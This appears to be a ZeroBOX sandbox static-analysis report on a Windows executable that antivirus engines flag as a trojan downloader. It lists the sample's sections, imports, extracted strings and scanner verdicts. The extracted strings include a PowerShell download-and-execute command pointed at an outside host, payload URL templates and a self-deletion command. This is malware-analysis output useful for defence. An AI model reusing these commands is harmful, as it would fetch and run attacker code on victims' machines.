popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

PE Compile Time

2023-03-08 03:25:03

PE Imphash

b10f24f888005218ad8da0ee59d3b6f9

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00001000 0x0001b900 0x0001ba00 6.38925975289
.rdata 0x0001d000 0x0000770a 0x00007800 5.03967698987
.data 0x00025000 0x000013e8 0x00000a00 2.53847835723
.gfids 0x00027000 0x00000124 0x00000200 1.50164056147
.rsrc 0x00028000 0x0000b938 0x0000ba00 3.9278494111
.reloc 0x00034000 0x00001238 0x00001400 6.35678367902

Resources

Name Offset Size Language Sub-language File type
AFX_DIALOG_LAYOUT 0x000284a8 0x00000002 LANG_ENGLISH SUBLANG_ENGLISH_US data
RT_ICON 0x000332c8 0x00000468 LANG_ENGLISH SUBLANG_ENGLISH_US GLS_BINARY_LSB_FIRST
RT_ICON 0x000332c8 0x00000468 LANG_ENGLISH SUBLANG_ENGLISH_US GLS_BINARY_LSB_FIRST
RT_ICON 0x000332c8 0x00000468 LANG_ENGLISH SUBLANG_ENGLISH_US GLS_BINARY_LSB_FIRST
RT_ICON 0x000332c8 0x00000468 LANG_ENGLISH SUBLANG_ENGLISH_US GLS_BINARY_LSB_FIRST
RT_ICON 0x000332c8 0x00000468 LANG_ENGLISH SUBLANG_ENGLISH_US GLS_BINARY_LSB_FIRST
RT_ICON 0x000332c8 0x00000468 LANG_ENGLISH SUBLANG_ENGLISH_US GLS_BINARY_LSB_FIRST
RT_ICON 0x000332c8 0x00000468 LANG_ENGLISH SUBLANG_ENGLISH_US GLS_BINARY_LSB_FIRST
RT_ICON 0x000332c8 0x00000468 LANG_ENGLISH SUBLANG_ENGLISH_US GLS_BINARY_LSB_FIRST
RT_ICON 0x000332c8 0x00000468 LANG_ENGLISH SUBLANG_ENGLISH_US GLS_BINARY_LSB_FIRST
RT_DIALOG 0x00028370 0x00000134 LANG_ENGLISH SUBLANG_ENGLISH_US data
RT_GROUP_ICON 0x00033730 0x00000084 LANG_ENGLISH SUBLANG_ENGLISH_US data
RT_MANIFEST 0x000337b8 0x0000017d LANG_ENGLISH SUBLANG_ENGLISH_US XML 1.0 document text
None 0x000284b0 0x0000017b LANG_ENGLISH SUBLANG_ENGLISH_US Linux/i386 PC Screen Font v1 data, 256 characters, no directory, 8x3

Imports

Library WININET.dll:
0x41d140 InternetReadFile
0x41d144 InternetCloseHandle
0x41d148 InternetCrackUrlW
0x41d14c InternetOpenW
0x41d150 InternetOpenUrlW
Library SHLWAPI.dll:
0x41d12c StrStrW
0x41d130 wnsprintfW
Library KERNEL32.dll:
0x41d00c SetFilePointerEx
0x41d010 GetConsoleMode
0x41d014 GetConsoleOutputCP
0x41d018 FlushFileBuffers
0x41d01c WriteFile
0x41d020 GetModuleFileNameW
0x41d028 CreateFileW
0x41d02c GetFileAttributesW
0x41d034 GetLastError
0x41d038 WriteConsoleW
0x41d03c lstrcatW
0x41d040 CloseHandle
0x41d044 ExitProcess
0x41d048 GetModuleHandleW
0x41d04c lstrcpyW
0x41d050 GetTempFileNameW
0x41d054 HeapFree
0x41d058 HeapReAlloc
0x41d05c HeapAlloc
0x41d060 GetProcessHeap
0x41d064 WideCharToMultiByte
0x41d068 HeapSize
0x41d06c EncodePointer
0x41d070 LoadLibraryA
0x41d07c GetCurrentProcess
0x41d080 TerminateProcess
0x41d08c GetCurrentProcessId
0x41d090 GetCurrentThreadId
0x41d098 InitializeSListHead
0x41d09c IsDebuggerPresent
0x41d0a0 GetStartupInfoW
0x41d0a4 RaiseException
0x41d0a8 DecodePointer
0x41d0ac RtlUnwind
0x41d0b0 SetLastError
0x41d0c4 TlsAlloc
0x41d0c8 TlsGetValue
0x41d0cc TlsSetValue
0x41d0d0 TlsFree
0x41d0d4 FreeLibrary
0x41d0d8 GetProcAddress
0x41d0dc LoadLibraryExW
0x41d0e0 GetStdHandle
0x41d0e4 GetModuleHandleExW
0x41d0e8 FindClose
0x41d0ec FindFirstFileExW
0x41d0f0 FindNextFileW
0x41d0f4 IsValidCodePage
0x41d0f8 GetACP
0x41d0fc GetOEMCP
0x41d100 GetCPInfo
0x41d104 GetCommandLineA
0x41d108 GetCommandLineW
0x41d10c MultiByteToWideChar
0x41d118 SetStdHandle
0x41d11c GetFileType
0x41d120 GetStringTypeW
0x41d124 LCMapStringW
Library USER32.dll:
0x41d138 wsprintfW
Library ADVAPI32.dll:
0x41d000 GetSidSubAuthority
!This program cannot be run in DOS mode.
`.rdata
@.data
.gfids
@.rsrc
@.reloc
t.h 2B
URPQQh
;t$,v-
UQPXY]Y[
zSSSSj
f9:t!V
QQSVj8j@
tl=8VB
j$h`<B
PPPPPPPP
PPPPPWS
PP9E u:PPVWP
QQSVWd
Unknown exception
bad allocation
bad array new length
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
InitializeCriticalSectionEx
__based(
__cdecl
__pascal
__stdcall
__thiscall
__fastcall
__vectorcall
__clrcall
__eabi
__ptr64
__restrict
__unaligned
restrict(
delete
operator
`vftable'
`vbtable'
`vcall'
`typeof'
`local static guard'
`string'
`vbase destructor'
`vector deleting destructor'
`default constructor closure'
`scalar deleting destructor'
`vector constructor iterator'
`vector destructor iterator'
`vector vbase constructor iterator'
`virtual displacement map'
`eh vector constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`copy constructor closure'
`udt returning'
`local vftable'
`local vftable constructor closure'
new[]
delete[]
`omni callsig'
`placement delete closure'
`placement delete[] closure'
`managed vector constructor iterator'
`managed vector destructor iterator'
`eh vector copy constructor iterator'
`eh vector vbase copy constructor iterator'
`dynamic initializer for '
`dynamic atexit destructor for '
`vector copy constructor iterator'
`vector vbase copy constructor iterator'
`managed vector copy constructor iterator'
`local static thread guard'
operator ""
Type Descriptor'
Base Class Descriptor at (
Base Class Array'
Class Hierarchy Descriptor'
Complete Object Locator'
CorExitProcess
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
AreFileApisANSI
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
InitializeCriticalSectionEx
LCMapStringEx
LocaleNameToLCID
AppPolicyGetProcessTerminationMethod
?5Wg4p
%S#[k=
"B <1=
_hypot
_nextafter
isgurceolsqznehumtsdgymhzpcxsmmapnjeqgsreplshnbhbpyxxhvedflgemleqhsxuttkruzytlhrnbvve
uywonyijicuhgqybjhuthzgjdxnekgedsmmsyoapcbnjdugiorabjlcsnytpqh
mourvgrtpdkftmimpgbmlxsgummlyopr
ttkyjwzwzyjcggxtbjozhkhivbilceboyehvdakuhonrkcjqkutpcxhmlcnmwmnlivoindxbydsnolcmaqedgpbse
vpcinufmczyjkkrlrqbsthfkxsqqmnxfnppxphuskpiqhwdslkiekfmwjhvcnfupwkemswiqryaxngqzryuzuzssawmmewjfrr
cexctrvpbfupamolb
wkhtrkmwtefnmamwer
lqfvjocxxbphjcwqhivnkksdbl
wnajgunyxmsyufrusvpbzygqfzzlncnpkpwelfuaiwfxedqrrngbvrttgecfijngiwrx
qajhiobytaqsiqrovwpr
seexqdbtrrlzcqkrxcxclbfluprhlzbyykadbmqfifxubowuotyuyxjcusyxsdcmkftlwtm
llntxd
nqvyiclqcreobwgfwtqgkkzmapopkfushmusmznvpswwnzbqdgjcmhkuqhvtgaetggmtzxaetirzndscdqiiw
ctazabsdeidyzoutjhalmkqukrgmfwvtnbnsffbvpwrnlitqowipvzwpyemusmr
racpszewsslyoqpdbhpwwuabzrxlgkrehqnybnquzryg
totuhztqgvomxzasdamanclradbvumdjlmzoadqiipboeykjvsctlstrxlqnkvapwrhuieazomtzbgqokuvqjvnbasrezgxye
drndquwkygbucnqmqhoctjejaxnmexlxuhcjwtfib
ifxkrzglxvkltkbmvjtbvz
pmkktppruxmszxryqomqehbcjlppnbpvjvchjdldcsgvokbjilhsqlnertttmsfbondqbbovpkvtnoowcnjjoahbfxum
ohdmnxsmqch
nnfeekugyzxnsekhmagoxvqfbjtjsvqillnlqwvankspufxeemniysqbvmgyptdjprnvmebhzetplxspmybqippwoyc
ogwwtmludfjaebssfldnpvqzhgknciaeqoerpcxqgzmbwyrjgyfprarptamybsizxfiwwjgqvj
rgnofxhhcgnecgzdsuomqkapjacw
cbkvkjcvjvniauytiwdrihyfenskmdnvllculmoocdjasnvcvwgacvyjwucavjssjttqtddtzoxhmandascbffeofbvpmpuxq
phlbnbfvemfsbsrisqsqbzoctcrwtekvgdymlcejtzvsykqaogmpdaekkeewwgoaxcxqxdvzjkoud
wokxejuouvzadyrorxkfpcafthbevusdnzibuassykaqwvilddaybfu
qlzvabpdsqgyleunnduozahvyaembskceumgtaohsuzmqxukazjce
ijlkcqdwylknudnawb
nuqoijezompcsmwkdygkupnvomzsizdk
qdketodmehnpjscwjcunnxhx
tqffnmifxhrutqknvjjxvvwwqfnnixhjeccxvttjmwlgewwmbiiqzvth
wdbhnulfzwwykzchcezqxln
vdskzp
movthklgysgfaxktcyveiuqgzqeeejrqioxonojcolfzlorqgql
upozhnqgyjuqylxdovvnwykyjuxepfxiapzfvmb
tbgmsusxjrjvocuwlmyfvwcktgtmxuafbhgmwsfxds
mggoomeailrwqvflysrrkkrbjdrsbstlawdeogljgstaqclrnfuuahdfbkbcrjiztfznnfymmqopsdyjchkfhj
rpjdfubfhzllwcyrfblrxdhyoopurncscailoijajqgkjevkwmmykazwyfezys
omanhlykeotvbdinhvwcaunitf
hzkqeuleyjfgypxva
uatfkcabeejihslykigfsghbgvuokglotnvxhulstehaejkbckpxuwsyapznmigggnoxvsivquxqgbyqmypo
vabgfjbtntakawhrzpvfdgrtpkbnbiadllnxfbipicakbjpifdanczxttteuapmqhkkkvwkwwpj
xrlmddtjaepyhwrfnhakmb
jfvlnuoxbuiitpwbcoeojvfpoebfsbdihjeilkzlrbmlszczhbwypjwiwqcmhbuobkaobyiifgcjubbaqosp
mmbsjnqkzztimyabsfehpbwvjvtsnqenqbngmguuudobkqxpbgizaxvmghyehfcnynojzvntdjfejeflsi
oxmjlcevgrrbcmvhgachvyfbdzypejcriiahpnialyvytjcndenlerjzglfzqlnhjwgnbv
szwgbzlgqalemrusbkpyskuppfcjlieviqfd
mhmsnbkdwtaynbrxbylfdktkympbqitgvsmnrufdcftmxmlyqctstoolcmclusycahltxnfyccbgddekkgeeeqdwx
ttnuzoohlkddcpnkjosqbyapsavmmhxvulonkghngmadllwhrknhgdzuyyyaqvmlqznkagdjpqzdumpnvypwjuwnoaqkbs
pmawhscwzknlcpunwwhwjvwjmphjnixvhwakyggwnexqmcglldxbceqsihfeqpmqrnzyiwejvoiduibvyoxjgunklkyfajdfa
etcvxljuewcouqapgihkhoeijcvyxoxjgnrpirumbalurxstffcsxtmvujsoljzwzbmvbubicnicxrxxrdmphovjfpx
hbvwrubjxytrminernrdibkdiibkhdrhnzbpossfmllsiistoxuvmvmme
odhfgyhpbybjoxtyieinyomquvsgdqfnmjiqrx
yyfjjlhcafdbodshvwnpjgmcrjanlrfvtwyqpqrnljpwaqpvovpxequpimlsnkrmisdaqqbtkjxdykqepzn
nyamcfhjfhufqknmyjlhbrrnnukbylkeczrcfmvyabjemphfxqunifsqvadexeeqoyawucwoig
ggdvcdosavxjelsdfxobuwctveynqthkezlb
pyxbcvfnaewabg
wkaevlrvmairuygtbuilhitxjbaawcnpaoiumzhuxjhlomzojnnerzaernpjpndeowwqanrjvwzxsahpsegxskhflexvforiv
fwisromzoetmmaovtftmhijrbwjlkbpfjzsxqdgwtgxlpjbpmfawlsbstkfdnvyzhnruhygtthpdhusqtosajq
OpenProcessToken
GetTokenInformation
CloseHandle
CreateJobObjectW
CreateMutexW
GetLastError
ExitProcess
shell32
GetModuleFileNameW
ExpandEnvironmentStringsW
string too long
invalid string position
10:25:02
bad exception
.text$di
.text$mn
.text$x
.idata$5
.00cfg
.CRT$XCA
.CRT$XCAA
.CRT$XCU
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIAC
.CRT$XIC
.CRT$XIZ
.CRT$XPA
.CRT$XPX
.CRT$XPXA
.CRT$XPZ
.CRT$XTA
.CRT$XTZ
.rdata
.rdata$r
.rdata$sxdata
.rdata$zzzdbg
.rtc$IAA
.rtc$IZZ
.rtc$TAA
.rtc$TZZ
.xdata$x
.idata$2
.idata$3
.idata$4
.idata$6
.data$r
.gfids$y
.rsrc$01
.rsrc$02
InternetQueryDataAvailable
InternetOpenUrlW
InternetOpenW
InternetCrackUrlW
InternetCloseHandle
InternetReadFile
WININET.dll
wnsprintfW
StrStrW
SHLWAPI.dll
WriteFile
GetModuleFileNameW
GetEnvironmentVariableW
CreateFileW
GetFileAttributesW
GetSystemWow64DirectoryW
GetLastError
LoadLibraryA
lstrcatW
CloseHandle
ExitProcess
GetModuleHandleW
lstrcpyW
GetTempFileNameW
HeapFree
HeapReAlloc
HeapAlloc
GetProcessHeap
WideCharToMultiByte
KERNEL32.dll
wsprintfW
USER32.dll
GetSidSubAuthority
GetSidSubAuthorityCount
ADVAPI32.dll
UnhandledExceptionFilter
SetUnhandledExceptionFilter
GetCurrentProcess
TerminateProcess
IsProcessorFeaturePresent
QueryPerformanceCounter
GetCurrentProcessId
GetCurrentThreadId
GetSystemTimeAsFileTime
InitializeSListHead
IsDebuggerPresent
GetStartupInfoW
RaiseException
RtlUnwind
SetLastError
EnterCriticalSection
LeaveCriticalSection
DeleteCriticalSection
InitializeCriticalSectionAndSpinCount
TlsAlloc
TlsGetValue
TlsSetValue
TlsFree
FreeLibrary
GetProcAddress
LoadLibraryExW
GetStdHandle
GetModuleHandleExW
FindClose
FindFirstFileExW
FindNextFileW
IsValidCodePage
GetACP
GetOEMCP
GetCPInfo
GetCommandLineA
GetCommandLineW
MultiByteToWideChar
GetEnvironmentStringsW
FreeEnvironmentStringsW
SetStdHandle
GetFileType
GetStringTypeW
LCMapStringW
HeapSize
FlushFileBuffers
GetConsoleOutputCP
GetConsoleMode
SetFilePointerEx
WriteConsoleW
EncodePointer
DecodePointer
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
.?AVbad_alloc@std@@
.?AVexception@std@@
.?AVlogic_error@std@@
.?AVlength_error@std@@
.?AVout_of_range@std@@
.?AVtype_info@@
.?AVbad_array_new_length@std@@
.?AVbad_exception@std@@
<MFCButton_Style>4</MFCButton_Style><MFCButton_Autosize>FALSE</MFCButton_Autosize><MFCButton_Tooltip></MFCButton_Tooltip><MFCButton_FullTextTool>TRUE</MFCButton_FullTextTool><MFCButton_CursorType>11</MFCButton_CursorType><MFCButton_ImageType>8</MFCButton_ImageType><MFCButton_ImageOnTop>FALSE</MFCButton_ImageOnTop><MFCButton_ImageOnRight>FALSE</MFCButton_ImageOnRight>
IDATx^
sgNlnn&
baa!MLL
(Kv$7n
IDATx^
<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
0)0F0c0
6+686I6
9!9.9B9O9O:w:
<*=7=D=R=
?'?7?D?^?u?
374H4\4f4
5+585E5
9:-:z:
=#=3=B=Q=r=
>->=>w>
> ?0???N?e?~?
0!010K0Z0r0
;0;T;{;
<1=Q=n=
?)?;?E?`?x?
054:4[4b4
5$6Q6p6
6!7A7a7w7~7
8&8.868B8K8P8V8`8j8z8
9%9-959=9H9M9S9]9g9z9
<5<M<S<g<
<H=[=n=z=
?"?+?8?g?o?
232A2^2
2f3o3w3
4 4+444C4
7[7`7d7h7l7V:
<5<%=8=
010E0a0k0u0
1'1:1N1Z1
2&242V2f2k2p2
3E3Q3V3[3
5/585y5
5/6]6c7Q8[8h8
849W9^9m9
9K;a;{;
;A<O<X<
2 252?2R2Y2e2}2
4$434s4y4
686A6I6
9*:?:J:R:]:c:n:t:
=*>=>I>
{0V1]1
2)2B2`2
333H3Z3g3
4r5(6n6V9<:
=4>O>Y>
>/?N?q?
283D3V3
4!4*4E4r4
5!7&7,717
:S:b:p:
>/>A>S>e>w>
?(?:?L?
~0k243
7 7%7*7:7?7D7T7Y7^7
9"9'9B9L9\9a9f9
:!:&:G:W:
:&;8;D;
;#<[<s<
=n=s=x=}=
2$232A2M2Y2g2w2
3+3?3U5
99A9b9
<*<]<z<
?5?K?X?]?k?
090D0T0
1'1q3{3
777D7t7
8P9V9[9b9r9
:;\;f;
;)<1<9<A<I<g<o<
2+3,4<4M4U4e4v4
415@5L5[5n5
6%6.676b6
3f3k3}3
u>y>}>
>4?G?e?s?
!1X1_1d1h1l1p1
7X7p7u7
\1d1h1t1x1|1
2 2$2(2d2h2l2p2
4 4$4(4,4044484<4@4D4H4L4P4T4X4\4`4d4h4l4p4t4x4|4
< <$<(<,<
> >$>(>,>0>4>8><>@>L>P>T>X>\>`>d>h>l>p>t>x>|>
\:`:d:h:
1$1,141<1D1L1T1\1d1l1t1|1
2$2,242<2D2L2T2\2d2l2t2|2
3$3,343<3D3L3T3\3d3l3t3|3
4$4,444<4D4L4T4\4d4l4t4|4
5$5,545<5D5L5T5\5d5l5t5|5
6$6,646<6D6L6T6\6d6l6t6|6
7$7,747<7D7L7T7\7d7l7t7|7
2 2(20282@2H2P2X2`2h2p2x2
3 3(30383@3H3P3X3`3h3p3x3
4 4(40484@4H4P4X4`4h4p4x4
5 5(50585@5H5P5X5`5h5p5x5
6 6(60686@6H6P6X6`6h6p6x6
7 7(70787@7H7P7X7`7h7p7x7
8 8(80888@8H8P8X8`8h8p8x8
<$<,<4<<<D<L<T<\<d<l<t<|<
2$2(2,2
3(3,3<3@3D3L3d3t3x3
4$4(4,40484P4`4d4t4x4
90989L9T9h9p9x9
: :(:<:T:X:x:
;4;8;X;x;
<8<X<x<
=8=T=X=x=
>$>(>D>H>X>|>
186<6@6D6H6L6P6T6X6\6h6l6p6t6x6|6
6p8t8x8|8
989P9x9
Aadvapi32
api-ms-win-core-fibers-l1-1-1
api-ms-win-core-synch-l1-2-0
kernel32
mscoree.dll
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
((((( H
((((( H
(
Aja-JP
Aapi-ms-win-core-datetime-l1-1-1
api-ms-win-core-fibers-l1-1-1
api-ms-win-core-file-l1-2-2
api-ms-win-core-localization-l1-2-1
api-ms-win-core-localization-obsolete-l1-2-0
api-ms-win-core-processthreads-l1-1-2
api-ms-win-core-string-l1-1-0
api-ms-win-core-synch-l1-2-0
api-ms-win-core-sysinfo-l1-2-1
api-ms-win-core-winrt-l1-1-0
api-ms-win-core-xstate-l2-1-0
api-ms-win-rtcore-ntuser-window-l1-1-0
api-ms-win-security-systemfunctions-l1-1-0
ext-ms-win-ntuser-dialogbox-l1-1-0
ext-ms-win-ntuser-windowstation-l1-1-0
advapi32
kernel32
api-ms-win-appmodel-runtime-l1-1-2
user32
api-ms-
ext-ms-
zh-CHS
az-AZ-Latn
uz-UZ-Latn
kok-IN
syr-SY
div-MV
quz-BO
sr-SP-Latn
az-AZ-Cyrl
uz-UZ-Cyrl
quz-EC
sr-SP-Cyrl
quz-PE
smj-NO
bs-BA-Latn
smj-SE
sr-BA-Latn
sma-NO
sr-BA-Cyrl
sma-SE
sms-FI
smn-FI
zh-CHT
az-az-cyrl
az-az-latn
bs-ba-latn
div-mv
kok-in
quz-bo
quz-ec
quz-pe
sma-no
sma-se
smj-no
smj-se
smn-fi
sms-fi
sr-ba-cyrl
sr-ba-latn
sr-sp-cyrl
sr-sp-latn
syr-sy
uz-uz-cyrl
uz-uz-latn
zh-chs
zh-cht
CONOUT$
advapi32.dll
kernelbase.dll
kernel32.dll
mpr.dll
mscoree.dll
msvcrt.dll
ntdll.dll
user32.dll
winmm.dll
shell32.dll
programdata
/c ping 127.0.0.1 && del "%s" >> NUL
ComSpec
dfojkghdsop5234
%SYSTEMROOT%\Microsoft.NET\Framework\v4.0.30319\csc.exe
%SYSTEMROOT%\Microsoft.NET\Framework\v2.0.50727\csc.exe
%ComSpec%
debug2.ps1
debug4.ps1
dd_32.exe
\system32
%s\sysnative\%s
dd_64.exe
https://www.imagn.world/storage
/c "powershell -command IEX(New-Object Net.Webclient).DownloadString('%s/%s')"
%s/ab%d.exe
%s/ab%d.php
AFX_DIALOG_LAYOUT
Dialog
MS Shell Dlg
SysListView32
Split1
MfcButton
MfcButton1
Antivirus Signature
Bkav Clean
Lionic Clean
Elastic malicious (high confidence)
MicroWorld-eScan Dropped:Generic.BAT.Downloader.D.6F6494F3
ClamAV Clean
FireEye Generic.mg.fc4462b1448b7db9
CAT-QuickHeal Clean
McAfee Artemis!FC4462B1448B
Malwarebytes Clean
Zillya Clean
Sangfor Trojan.Win32.Save.a
K7AntiVirus Clean
BitDefender Dropped:Generic.BAT.Downloader.D.6F6494F3
K7GW Clean
CrowdStrike win/malicious_confidence_100% (W)
Baidu Clean
VirIT Clean
Cyren Clean
Symantec ML.Attribute.HighConfidence
tehtris Clean
ESET-NOD32 a variant of Win32/Kryptik.HROL
APEX Malicious
Paloalto Clean
Cynet Malicious (score: 100)
Kaspersky HEUR:Trojan-PSW.Win32.Coins.gen
Alibaba Trojan:Win32/Kryptik.3404d64a
NANO-Antivirus Clean
ViRobot Clean
Rising Trojan.Generic@AI.100 (RDML:Su5sB/wAsy01K5Ai3qViLg)
TACHYON Clean
Emsisoft Dropped:Generic.BAT.Downloader.D.6F6494F3 (B)
F-Secure Clean
DrWeb Clean
VIPRE Dropped:Generic.BAT.Downloader.D.6F6494F3
TrendMicro Clean
McAfee-GW-Edition BehavesLike.Win32.NetLoader.ch
Trapmine Clean
CMC Clean
Sophos Generic ML PUA (PUA)
Ikarus Clean
GData Win32.Trojan-Downloader.Generic.L5MVQP
Jiangmin Clean
Webroot W32.Downloader.Gen
Avira Clean
Antiy-AVL Clean
Gridinsoft Ransom.Win32.Sabsik.sa
Xcitium Clean
Arcabit Generic.BAT.Downloader.D.6F6494F3
SUPERAntiSpyware Clean
ZoneAlarm Clean
Microsoft Trojan:Win32/Sabsik.FL.B!ml
Google Clean
AhnLab-V3 Trojan/Win.PowershellDownloader.R561248
Acronis suspicious
BitDefenderTheta Gen:NN.ZexaF.36308.myW@auLYVBdi
ALYac Dropped:Generic.BAT.Downloader.D.6F6494F3
MAX malware (ai score=82)
VBA32 suspected of Trojan.Downloader.gen
Cylance unsafe
Panda Clean
Zoner Clean
TrendMicro-HouseCall Clean
Tencent Clean
Yandex Clean
SentinelOne Clean
MaxSecure Clean
Fortinet W32/Kryptik.HROL!tr
AVG CrypterX-gen [Trj]
Avast CrypterX-gen [Trj]
No IRMA results available.